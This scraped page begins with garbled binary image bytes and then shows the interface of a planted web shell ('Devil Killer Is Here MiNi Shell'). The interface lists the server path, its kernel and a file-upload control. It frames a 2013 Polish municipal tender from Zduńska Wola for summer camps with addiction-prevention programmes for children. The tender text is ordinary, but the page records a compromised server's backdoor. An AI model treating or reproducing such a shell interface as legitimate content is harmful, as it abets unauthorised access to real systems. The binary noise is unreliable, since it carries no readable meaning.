JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130425/164558-N-2013.html

<p class="kh_header"><b>Zduńska Wola: Przedmiotem zamówienia jest usługa polegającą na:  zorganizowaniu i przeprowadzeniu kolonii letnich  z programem profilaktyki uzależnień dla dzieci  i młodzieży z terenu miasta Zduńska Wola w dwóch grupach wiekowych (9-13 lat uczniowie szkół podstawowych i 14-16 lat uczniowie szkół gimnazjalnych)  w okresie od  08 lipca do 29 sierpnia 2013 r.</b><br>
<b>Numer ogłoszenia: 164558 - 2013; data zamieszczenia: 25.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zduńska Wola , ul. Stefana Złotnickiego 12, 98-220 Zduńska Wola, woj. łódzkie, tel. 43 825 02 00, faks 43 825 02 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdunskawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa polegającą na:  zorganizowaniu i przeprowadzeniu kolonii letnich  z programem profilaktyki uzależnień dla dzieci  i młodzieży z terenu miasta Zduńska Wola w dwóch grupach wiekowych (9-13 lat uczniowie szkół podstawowych i 14-16 lat uczniowie szkół gimnazjalnych)  w okresie od  08 lipca do 29 sierpnia 2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

Część A. Kolonie dla dzieci w wieku od 9 do 13 lat (uczniowie szkoły podstawowej)
1. Miejsce pobytu:
1) miejscowości tylko w województwach:
kujawsko - pomorskim; wielkopolskim; opolskim, świętokrzyskim, mazowieckim,
 z nieodpłatnym dostępem do strzeżonych  kąpielisk  wodnych,
2) zakwaterowanie dzieci, kadry wychowawców i kierownika w jednym ośrodku (w rozumieniu przepisów ustawy Prawo budowlane), z pełnym węzłem sanitarnym (natrysk, umywalka i WC). Uwaga! Zamawiający nie wyraża zgody na zakwaterowanie uczestników w namiotach, domkach campingowych, pawilonach,
3) teren ośrodka powinien być usytuowany z dala od dróg o dużym natężeniu ruchu oraz od torów kolejowych, tj. w odległości nie mniejszej niż 500 m  i musi być ogrodzony, 4) w pokojach dzieci  maksymalnie 5 łóżek, z wyłączeniem łóżek piętrowych i tzw. dostawek, 5) pokoje ze standardowym wyposażeniem (co najmniej: szafka nocna przy każdym łóżku- tapczaniku, szafa, stół, krzesła w ilości odpowiadającej ilości dzieci w pokoju,  6) pokoje i łazienki muszą być estetyczne i czyste, 7) pokoje wychowawców i dzieci  muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach, na każdej z nich musi znajdować się pokój wychowawców,
8) co najmniej jedna łazienka (natrysk, umywalki i WC) na cztery pokoje. Ciepła woda bez ograniczeń, 9) na terenie ośrodka powinna znajdować się stołówka,
10) na terenie ośrodka bądź w jego najbliższej okolicy powinien znajdować się ogólnie dostępny telefon na kartę magnetyczną/chipową, 11) Ośrodek musi dysponować:
a) salą dyskotekową ze sprzętem dyskotekowym, b) świetlicą wyposażoną w stoliki i krzesła, gry planszowe, układanki itp., TV c) wokół obiektu teren sportowo - rekreacyjny, d) dysponować drobnym sprzętem sportowym (np.: piłki do gier zespołowych, sprzęt do badmintona, stół z rakietkami do tenisa stołowego, itp.),
e) izolatką, oddzielna dla dziewcząt i chłopców, f) salą przystosowaną do prowadzenia  programu profilaktyki uzależnień, 12) Wykonawca zapewni nieodpłatną dostępność  wymienionych w pkt 11 obiektów i sprzętów.
Uwaga! Zamawiający przed podpisaniem umowy z wybranym wykonawcą zastrzega sobie prawo kontroli obiektu. Mile widziane aktualne zdjęcia obiektu, w tym: zdjęcia pokoi, łazienek, stołówki oraz przyległego terenu.
2. Ilość i czas trwania turnusów:
1) wypoczynek dla dzieci ma być zorganizowany w formie jednego turnusu,
2) czas trwania turnusu - 11 dni, tj 10 dób (10 noclegów i 10 pełnych dni żywieniowych). 
3. Liczba uczestników kolonii: 
1) uczestnikami kolonii będą dzieci i młodzież w wieku 9 - 13 lat, ogółem 55 dzieci.
Zamawiający we własnym zakresie zorganizuje nabór uczestników kolonii. Lista uczestników kolonii przekazywana będzie Wykonawcy zamówienia na 7 dni przed  planowanym turnusem.
4. Wymogi dotyczące wyżywienia: 
1) cztery (4) posiłki dziennie: śniadanie, obiad - składający się z dwóch ciepłych dań,  podwieczorek i kolacja, 2) zapewnienie suchego prowiantu na drogę powrotną z miejsca pobytu do Zduńskiej Woli, 3) dzieci muszą mieć stały dostęp do napoi - w stołówce lub na korytarzu przed stołówką Wykonawca udostępni przez całą dobę zimne napoje, kompot bądź herbatę, 4) posiłki winny być urozmaicone, odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, bogatych w witaminy, owoce i warzywa, 5) każdy turnus rozpoczyna się obiadem w pierwszym dniu pobytu i kończy się śniadaniem w  ostatnim dniu pobytu.
5. Transport:
1) transport zapewnia Wykonawca, 2) transport autokarowy z klimatyzacją na trasie: Zduńska Wola/obiekt, obiekt /Zduńska Wola, 3) pojazdy muszą być sprawne. Autokar musi być wyposażony w dostateczną liczbę miejsc siedzących zgodnie z liczbą przewożonych uczestników, 4) dokładne godziny wyjazdu i powrotu autokaru dla poszczególnych turnusów ustalone zostaną w późniejszym okresie, 5) Wykonawca zapewnia dwóch opiekunów do każdego autokaru na każdorazowy przejazd. Zamawiający wyklucza przewóz dzieci autokarami w godzinach nocnych tzn. między godz. 22.00 a 6.00.  6) Koszty ubezpieczenie autokaru i dzieci podczas przejazdu pokrywa Wykonawca. 7) Zamawiający zastrzega sobie prawo powiadomienia Policji w celu kontroli pojazdu przed wyjazdem dzieci na kolonie.
6. Ubezpieczenie:
1) Wykonawca zapewnia ubezpieczenie uczestników i kadry od następstw nieszczęśliwych wypadków i kosztów leczenia,  2) ubezpieczenie obejmujące okres od momentu przekazania dzieci pod opiekę wychowawców z miejsca zbiórki w Zduńskiej Woli, do momentu odebrania dzieci przez opiekunów/ rodziców  w Zduńskiej Woli, 3) Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników kolonii w trakcie podróży oraz podczas pobytu dziecka w ośrodku,
4) Wykonawca zobowiązany jest do posiadania ubezpieczenia OC. 
7. Opieka: 
1. Na każdym turnusie Wykonawca zapewnia:
a) całodobową opiekę wykwalifikowanej kadry wychowawców (tylko z poniższej grupy zawodowej), posiadających co najmniej 3 letni staż i doświadczenie w pracy z dziećmi na kolonii:
1) nauczycieli, 2) studentów szkół wyższych kierunków i specjalności, których program obejmuje przygotowanie pedagogiczne, po odbyciu odpowiedniego przeszkolenia, 3) trenerów i instruktorów sportowych,
w liczbie zgodnej z normami rozporządzenia Ministra Edukacji Narodowej z dnia 09 grudnia 2009 r. zmieniające rozporządzenie w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci  i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 2009 r. Nr 218,  poz. 1696), b) kierownika kolonii z  uprawnieniami MEN stosownie do w/w rozporządzenia oraz kierownika obiektu, c) osobę/osoby realizujące  program profilaktyki uzależnień - (socjoterapeuta, psycholog-socjoterapeuta) legitymujące się dyplomem wyższej uczelni i zaświadczeniem o dodatkowych uprawnieniach  w zakresie profilaktyki uzależnień, d) bezpłatną opiekę medyczną lekarsko - pielęgniarską, tj. pielęgniarka obecna w ośrodku 24 godziny na dobę, lekarz pierwszego kontaktu na gotowość 24 godziny na dobę, zakup lekarstw i materiałów opatrunkowych dla dzieci w trakcie trwania kolonii w ramach kosztów Wykonawcy, e) opiekę ratownika (jeżeli przy kąpieliskach wodnych nie ma zapewnionej opieki ratownika), f) obsługę sprzątająco - porządkową dla utrzymania czystości w całym obiekcie oraz  w jego okolicy.

Część B. Kolonie dla dzieci w wieku od 14 do 16 lat (uczniowie szkoły gimnazjalnej)
1. Miejsce pobytu:
1) miejscowości tylko w województwach:
kujawsko - pomorskim; wielkopolskim; opolskim, świętokrzyskim, mazowieckim, 
z nieodpłatnym dostępem do strzeżonych  kąpielisk  wodnych,
2. Zakwaterowanie w ośrodku: 
1) dzieci, kadra wychowawców i kierownika kolonii w  budynkach, pawilonach z dostępem do pełnego węzła sanitarnego z ciepłą wodą bez ograniczeń (placówka zatwierdzona przez Kuratorium Oświaty - zgodnie z przepisami MEN),  2) teren ośrodka powinien być usytuowany z dala od dróg o dużym natężeniu ruchu oraz od torów kolejowych, tj. w odległości nie mniejszej niż 500 m.  Teren musi być ogrodzony, 3) w pokojach dzieci  maksymalnie 5 łóżek, z wyłączeniem łóżek piętrowych i tzw. dostawek, pokoje ze standardowym wyposażeniem (co najmniej: szafka nocna przy każdym łóżku- tapczaniku, szafa, stół, krzesła w ilości odpowiadającej ilości dzieci w pokoju, 4) pokoje i łazienki muszą być estetyczne i czyste, 5) pokoje wychowawców i dzieci  muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach, na każdej z nich musi znajdować się pokój wychowawców,
6) co najmniej jedna łazienka (natrysk, umywalki i WC) na cztery pokoje. Ciepła woda bez ograniczeń, 7) na terenie ośrodka powinna znajdować się stołówka,
8) na terenie ośrodka bądź w jego najbliższej okolicy powinien znajdować się ogólnie dostępny telefon na kartę magnetyczną/chipową, 9) ośrodek  musi dysponować:
a) salą na organizowanie dyskotek ze sprzętem dyskotekowym,
b) świetlicą wyposażoną w stoliki i krzesła, gry planszowe, układanki itp., TV
c) ośrodek wyposażony w  teren sportowo - rekreacyjny,
d) dysponować drobnym sprzętem sportowym (np.: piłki do gier zespołowych, sprzęt do badmintona, stół z rakietkami do tenisa stołowego, itp.),
e) izolatką, oddzielna dla dziewcząt i chłopców,
f) miejscem przystosowanym do prowadzenia  programu profilaktyki uzależnień,
12) Wykonawca zapewni nieodpłatną dostępność  wymienionych w pkt 9 obiektów i sprzętów.
Uwaga! Zamawiający przed podpisaniem umowy z wybranym wykonawcą zastrzega sobie prawo kontroli obiektu. Mile widziane aktualne zdjęcia obiektu, w tym: pokoi, łazienek, stołówki oraz przyległego terenu. 
2a. Zakwaterowanie na obozowisku:
Uwaga!. Namioty muszą być: stabilne, czyste, nie przemakalne, bez uszkodzeń i rozdarć. Wejścia do namiotów zamykane na suwak lub sznurowane,
1) dzieci i kadra wychowawców zakwaterowana w namiotach z dostępem do pełnego węzła sanitarnego z ciepłą wodą bez ograniczeń (placówka zatwierdzona przez Kuratorium Oświaty - zgodnie z przepisami MEN), 2) teren obozowiska powinien być usytuowany z dala od dróg o dużym natężeniu ruchu oraz od torów kolejowych, tj. w odległości nie mniejszej niż 500 m.  Teren musi być ogrodzony, 3) w namiotach obowiązkowo drewniana podłoga, stolik, taborety w odpowiedniej ilości, maksymalnie 6 kanadyjek z wyłączeniem łóżek piętrowych, odpowiednia ilość półek na przybory toaletowe, odzież, torby bagażowe/ plecaki,  4) pomieszczenia sanitarne (ubikacje, natryski, umywalnie) estetyczne i czyste, 5) na terenie obozowiska muszą znajdować się minimum 4 ubikacje (oddzielnie dla dziewcząt i chłopców)  oraz minimum 6 natrysków, 6) namioty wychowawców muszą znajdować się obok namiotów uczestników, 7) na terenie obozowiska powinna znajdować się stołówka,
8) na terenie obozowiska bądź w jego najbliższej okolicy powinien znajdować się ogólnie dostępny telefon na kartę magnetyczną/chipową, 9) teren obozowiska  musi dysponować: a) miejscem zadaszonym na organizowanie dyskotek ze sprzętem dyskotekowym, b) świetlicą wyposażoną w stoliki i krzesła, gry planszowe, układanki itp., TV, c) obozowisko wyposażone w  teren sportowo - rekreacyjny, d) dysponować drobnym sprzętem sportowym (np.: piłki do gier zespołowych, sprzęt do  badmintona, stół z rakietkami do tenisa stołowego, itp.), e) izolatką, oddzielna dla dziewcząt i chłopców, f) miejscem przystosowanym do prowadzenia  programu profilaktyki uzależnień.
12) Wykonawca zapewni nieodpłatną dostępność  wymienionych w pkt 9 obiektów i sprzętów.
Uwaga! Zamawiający przed podpisaniem umowy z wybranym wykonawcą zastrzega sobie prawo kontroli obozowiska. Mile widziane aktualne zdjęcia namiotów i ich wyposażenie, pomieszczeń sanitarnych, stołówki i kuchni oraz terenu przyległego.
3. Ilość i czas trwania turnusów:
1) wypoczynek dla dzieci ma być zorganizowany w formie jednego turnusu,
2) czas trwania turnusu - 11 dni, tj 10 dób (10 noclegów i 10 pełnych dni żywieniowych). 
4. Liczba uczestników kolonii: 
1) uczestnikami kolonii będzie młodzież w wieku 14 - 16 lat, ogółem 55 uczestników.
Zamawiający we własnym zakresie zorganizuje nabór uczestników kolonii. Lista uczestników kolonii przekazywana będzie Wykonawcy zamówienia na 7 dni przed  planowanym turnusem.
5. Wymogi dotyczące wyżywienia: 
1) cztery (4) posiłki dziennie: śniadanie, obiad - składający się z dwóch ciepłych dań,  podwieczorek i kolacja, 2) zapewnienie suchego prowiantu na drogę powrotną z miejsca pobytu do Zduńskiej Woli, 3) dzieci muszą mieć stały dostęp do napoi - w stołówce lub na korytarzu przed stołówką Wykonawca udostępni przez całą dobę zimne napoje, kompot bądź herbatę, 4) posiłki winny być urozmaicone, odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, bogatych w witaminy, owoce i warzywa, 5) każdy turnus rozpoczyna się obiadem w pierwszym dniu pobytu i kończy się śniadaniem w  ostatnim dniu pobytu.
6. Transport:
1) transport zapewnia Wykonawca, 2) transport autokarowy z klimatyzacją na trasie: Zduńska Wola - miejsce pobytu, miejsce pobytu - Zduńska Wola, 3) pojazdy muszą być sprawne. Autokar musi być wyposażony w dostateczną liczbę miejsc siedzących zgodnie z liczbą przewożonych uczestników, 4) dokładne godziny wyjazdu i powrotu autokaru dla poszczególnych turnusów ustalone zostaną w późniejszym okresie, 5) Wykonawca zapewnia dwóch opiekunów do każdego autokaru na każdorazowy przejazd. Zamawiający wyklucza przewóz dzieci autokarami w godzinach nocnych tzn. między godz. 22.00 a 6.00.  6) Koszty ubezpieczenie autokaru i dzieci podczas przejazdu pokrywa Wykonawca. 7) Zamawiający zastrzega sobie prawo powiadomienia Policji w celu kontroli pojazdu przed wyjazdem dzieci na kolonie.
7. Ubezpieczenie:
1) Wykonawca zapewnia ubezpieczenie uczestników i kadry od następstw nieszczęśliwych wypadków i kosztów leczenia, 2) ubezpieczenie obejmujące okres od momentu przekazania dzieci pod opiekę wychowawców z miejsca zbiórki w Zduńskiej Woli, do momentu odebrania dzieci przez opiekunów/ rodziców w Zduńskiej Woli,
3) Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników kolonii w trakcie podróży oraz podczas pobytu dziecka w ośrodku,
4) Wykonawca zobowiązany jest do posiadania ubezpieczenia OC. 
8. Opieka: 
1. Na każdym turnusie Wykonawca zapewnia:
a) całodobową opiekę wykwalifikowanej kadry wychowawców (tylko z poniższej grupy zawodowej), posiadających co najmniej 3 - letni staż i doświadczenie w pracy z dziećmi na kolonii: nauczycieli, studentów szkół wyższych kierunków i specjalności, tórych program obejmuje przygotowanie pedagogiczne, po odbyciu odpowiedniego przeszkolenia, trenerów i instruktorów sportowych, w liczbie zgodnej z normami rozporządzenia Ministra Edukacji Narodowej z dnia 09 grudnia 2009 r. zmieniające rozporządzenie w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci  i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 2009 r. Nr 218,  poz. 1696), b) kierownika kolonii z  uprawnieniami MEN stosonie do w/w rozporządzenia oraz kierownika obiektu, c) osobę/osoby realizujące  program profilaktyki uzależnień (socjoterapeuta, psycholog-socjoterapeuta) legitymujące się dyplomem wyższej uczelni i zaświadczeniem o dodatkowych uprawnieniach  w zakresie profilaktyki uzależnień, d) bezpłatną opiekę medyczną lekarsko - pielęgniarską, tj. pielęgniarka obecna  w ośrodku, na obozowisku 24 godziny na dobę, lekarz pierwszego kontaktu na gotowość 24 godziny na dobę, zakup lekarstw i materiałów opatrunkowych dla dzieci w trakcie trwania kolonii w ramach kosztów Wykonawcy, e) opiekę ratownika (jeżeli przy kąpieliskach wodnych nie ma zapewnionej opieki ratownika).
9. Pozostałe wymagania: 
Wykonawca przedstawi:
1) pisemny ramowy program kolonii uwzględniający imprezy sportowe, gry i zabawy ruchowe, gry terenowe, gry i zabawy świetlicowe, konkursy, ogniska dyskoteki oraz zajęcia alternatywne w razie niepogody. W ramach programu Wykonawca winien zorganizować: wycieczki wyjazdowe poza miejscowość w której odbywają się kolonie (należy podać informację, że jest wycieczka autokarowa), wycieczki piesze, dyskoteki, ogniska, konkursy z nagrodami, 2) pisemny program profilaktyki uzależnień obejmujący bloki tematyczne w zakresie relacji interpersonalnych, kształtowania umiejętności w zakresie rozwiązywania problemów uzależnień, stresu, agresji i innych emocji oraz zagrożeń płynących z kontaktu dzieci i młodzieży ze środkami psychoaktywnymi.
Realizacja programu podczas kolonii: codziennie, co najmniej 1,5 godziny, w grupach liczących maksymalnie 20 osób przez cały okres trwania turnusu, 3) Wykonawca przedstawi sprawozdanie merytoryczne z realizacji programu profilaktyki i szczegółowe z  realizacji ramowego programu kolonii w ciągu 14 dni od dnia zakończenia kolonii, 4) Wykonawca zapewni artykuły piśmienne niezbędne do prowadzenia zajęć oraz nagrody rzeczowe i dyplomy dla uczestników kolonii za udział  w konkursach i zabawach.
UWAGA !!!  Wykonawca ma możliwość złożenia jednej oferty na Część A i B wypełniając dwa Załączniki nr 1 i 1a - oddzielnie dla każdej Części..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.24.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji, mogą ubiegać się Wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Wymogi podmiotowe uważa się za spełnione, jeżeli wykonawca w ofercie przedłoży oświadczenia, dokumenty potwierdzające ich spełnienie. Powyższe zostanie ocenione metodą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia informacji o wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej po jednej usłudze rocznie odpowiadającej swoim rodzajem usługom stanowiącym przedmiot zamówienia dla minimum 80 osób</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował odpowiednią bazą noclegową, rekreacyjno - wypoczynkową niezbędną do wykonania zamówienia zgodnie ze SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dla wykonania przedmiotu zamówienia zobowiązany jest zapewnić personel posiadający wymagane uprawnienia- wymagania minimalne w zakresie obsady osobowej: kierownik kolonii , powinien mieć ukończony kurs dla kierowników placówek wypoczynku  oraz co najmniej trzyletni staż pracy opiekuńczo- wychowawczej lub dydaktyczno wychowawczej; wychowawcy minimum- 1 na 20 uczestników (w przypadku dzieci poniżej 10 roku życia  minimum 1   na 15 uczestników), pielęgniarka całodobowo, lekarz na każde wezwanie, ratownik w czasie korzystania przez uczestników kolonii z wyznaczonych kąpielisk, socjoterapeuta, psycholog socjoterapeuta posiadający kwalifikacje do realizacji programu z zakresu profilaktyki uzależnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedłożyć kserokopię opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

